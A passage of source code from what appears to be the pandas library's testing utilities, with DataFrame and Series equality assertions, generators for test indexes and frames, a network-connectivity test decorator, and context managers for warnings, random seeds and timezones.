check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}",
)
if check_like:
left, right = left.reindex_like(right), right
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.columns",
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
if is_period_dtype(obj):
return period_array(obj)
elif is_datetime64_dtype(obj) or is_datetime64tz_dtype(obj):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(obj):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Just ensure a
pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if not errno and hasattr(errno, "reason"):
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = (
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
class RNGContext:
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
